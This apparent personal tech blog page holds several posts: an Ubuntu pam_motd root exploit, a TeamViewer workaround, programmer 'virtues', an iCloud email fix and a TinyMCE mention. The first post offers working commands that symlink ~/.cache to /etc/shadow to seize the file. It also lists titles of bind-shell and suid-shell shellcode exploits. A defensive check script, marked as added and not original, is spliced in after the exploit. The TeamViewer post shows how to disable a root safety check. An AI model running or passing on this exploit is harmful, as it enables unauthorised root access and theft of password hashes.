Thursday, December 29, 2011

Ubuntu root access

The PAM_MOTD exploit for Ubuntu is still not patched…

rm -rf ~/.cache;
ln -s /etc/shadow ~/.cache;
ssh localhost   # trigger pam_motd by re-logging in and you’ll own /etc/shadow
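A defensive check for the commands above, as an added example that is not part of the original post: it reports any home directory whose .cache has been replaced by a symlink and verifies that /etc/shadow is still owned by uid 0. The function names and the list of sensitive targets are assumptions made for this illustration.

```shell
#!/bin/sh
# Added example, not from the original post. Function names and the
# SENSITIVE list are assumptions made for this illustration.
SENSITIVE="/etc/shadow /etc/gshadow /etc/passwd /etc/sudoers"

# Numeric owner uid of a path (of the link itself if it is a symlink).
owner_uid() {
    ls -lnd -- "$1" 2>/dev/null | awk '{print $3}'
}

# Classify <home>/.cache: prints OK, "SYMLINK <target>" or "CRITICAL <target>".
check_cache() {
    cache="$1/.cache"
    if [ ! -L "$cache" ]; then
        echo "OK"
        return 0
    fi
    target=$(readlink "$cache")
    for s in $SENSITIVE; do
        if [ "$target" = "$s" ]; then
            echo "CRITICAL $target"
            return 0
        fi
    done
    echo "SYMLINK $target"
}

# Report every directory under a base (default /home) with a symlinked .cache.
audit_homes() {
    base=${1:-/home}
    for home in "$base"/*; do
        [ -d "$home" ] || continue
        result=$(check_cache "$home")
        [ "$result" = "OK" ] || echo "$home: $result"
    done
    return 0
}

# True only if the file (default /etc/shadow) is still owned by uid 0.
shadow_owner_ok() {
    [ "$(owner_uid "${1:-/etc/shadow}")" = "0" ]
}

audit_homes "${1:-/home}"
shadow_owner_ok || echo "WARNING: /etc/shadow is not owned by uid 0"
```

Any symlinked .cache is reported; CRITICAL only marks targets that match the list literally, so a SYMLINK finding still deserves a look.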



In a recent thread it was suggested that Linux is as vulnerable as Windows, and as proof a list of exploits was given that were published on almost the same day as the discussion. Here is the list that was given:
Quote

2011-07-08 Ubuntu PAM MOTD File Tampering (Privilege Escalation)
2011-07-05 linux/x86 polymorphic Drop suid shell root /tmp/.hiddenshell 161 bytes
2011-07-05 linux/x86 bind sh@64533 97 bytes
2011-07-05 linux/x86 lynx polymorphic shellcode 84 bytes
2011-07-05 linux/x86 setreuid(0,0) execve(“/bin/sh”,NULL,NULL) encoded 62 bytes
2011-07-05 linux/x86 /proc/sys/kernel/randomize_va_space SUB encoded 111 bytes
2011-07-05 linux/x86 bind port to 6678 XOR encoded polymorphic shellcode 125 bytes
2011-07-05 linux/x86 nc -lp 31337 -e /bin/sh polymorphic shellcode 91 bytes

Cheers,

Ujjwal Soni

Running TeamViewer 6 as root on Linux

While attempting to run TeamViewer 6 on BT5, as usual, I got the error:

Error: TeamViewer must not be executed as root!

So the solution is simple:

root@bt:~# cd /opt/teamviewer/teamviewer/6/bin/
root@bt:/opt/teamviewer/teamviewer/6/bin# gedit wrapper

Then edit the file: instead of “die”, just replace that with “echo”. This way it will run and still remind you of the security issue every time.


function validate_user()
{
    local userid=$(id -u)

    # Originally "die"; "echo" prints the warning but lets the wrapper continue.
    if [ "$userid" = 0 ] ; then
        echo "TeamViewer must not be executed as root!"
    fi
}

Or simply comment out the whole if – fi structure.

Cheers!

Ujjwal Soni

Tuesday, December 27, 2011

The 3 virtues of a great programmer

1. Laziness - The quality that makes you go to great effort to reduce overall energy expenditure. It makes you write labor-saving programs that other people will find useful, and document what you wrote so you don't have to answer so many questions about it. Hence, the first great virtue of a programmer. Also hence, this book. See also impatience and hubris.

2. Impatience - The anger you feel when the computer is being lazy. This makes you write programs that don't just react to your needs, but actually anticipate them. Or at least pretend to. Hence, the second great virtue of a programmer. See also laziness and hubris.

3. Hubris - Excessive pride, the sort of thing Zeus zaps you for. Also the quality that makes you write (and maintain) programs that other people won't want to say bad things about. Hence, the third great virtue of a programmer. See also laziness and impatience.

Source: Wikipedia

Cheers,

Ujjwal Soni

Monday, December 12, 2011

How to Solve Apple iCloud Verification Email Problem

Apple recently launched its cloud storage service, iCloud. When I tried setting up iCloud on my iPhone 4, I was stuck with the verification email problem. The setup wizard kept asking for iCloud email verification, but I couldn’t find any option to send or resend the iCloud verification email to my email address so that I could verify it. On further research I found that Apple has changed the way it handles Apple IDs. Your email address and Apple ID now have to be the same; this is unlike how Apple used to handle Apple IDs and email addresses. Until now you could create multiple Apple IDs with one email address or, in other words, a single email address could be associated with multiple Apple IDs. This got me to the root of the problem: why I was not receiving the iCloud verification email. If you are facing the same problem, please follow the steps below to receive the iCloud verification email:

1. Go to https://appleid.apple.com/

2. Click on the “Find out” link under “Not sure if you have an Apple ID?”



3. Fill out your first name, last name and the email address that you want to use for receiving iCloud verification email.

4. On the next screen, select the “Email Authentication” option and click “Next”.

5. Now, go to your Email Inbox and you will find an email from Apple on how to reset the Apple ID password. Click on the “Reset your Apple ID password” link in the email.

6. You will be shown more than one Apple ID associated with your email address.


7. Now, choose the Apple ID that you would NOT like to use for receiving iCloud verification email and click “Next”.

8. Reset the password for this account by providing a new password.

9. Log in to Apple ID by visiting https://appleid.apple.com/ and clicking the “Manage your account” link. Use the Apple ID that you would NOT like to use for receiving iCloud verification email and the password that you have just set.

10. Click on the “Edit” link under the “Primary Email Address” section and provide a new email address. Click “Save”.

11. Click Sign Out.

Once you have changed the email address for the Apple ID that you would NOT like to use for receiving iCloud verification email, it’s time to set things right in the Apple ID that you would like to use for iCloud services. Just log in to your account at https://appleid.apple.com/ with the Apple ID that you would like to use for receiving iCloud verification email. You should now see the link to resend the verification email under your email address. Click on that link, confirm your email address and you will be all set to use iCloud.

Friday, December 9, 2011

TinyMCE Text Area

Hi All,

Recently I was preparing an application based on JSP/Struts. I had a requirement to implement custom font and color selection for each text area on the screen (the screen had multiple text areas). I found a cool script which allows me to implement visual effects on my text areas: TinyMCE is a platform independent web based Javascript HTML WYSIWYG editor control released as Open Source under LGPL by Moxiecode Systems.

http://www.tinymce.com

It's very easy and fast to implement. :)

Thanks,

Ujjwal Soni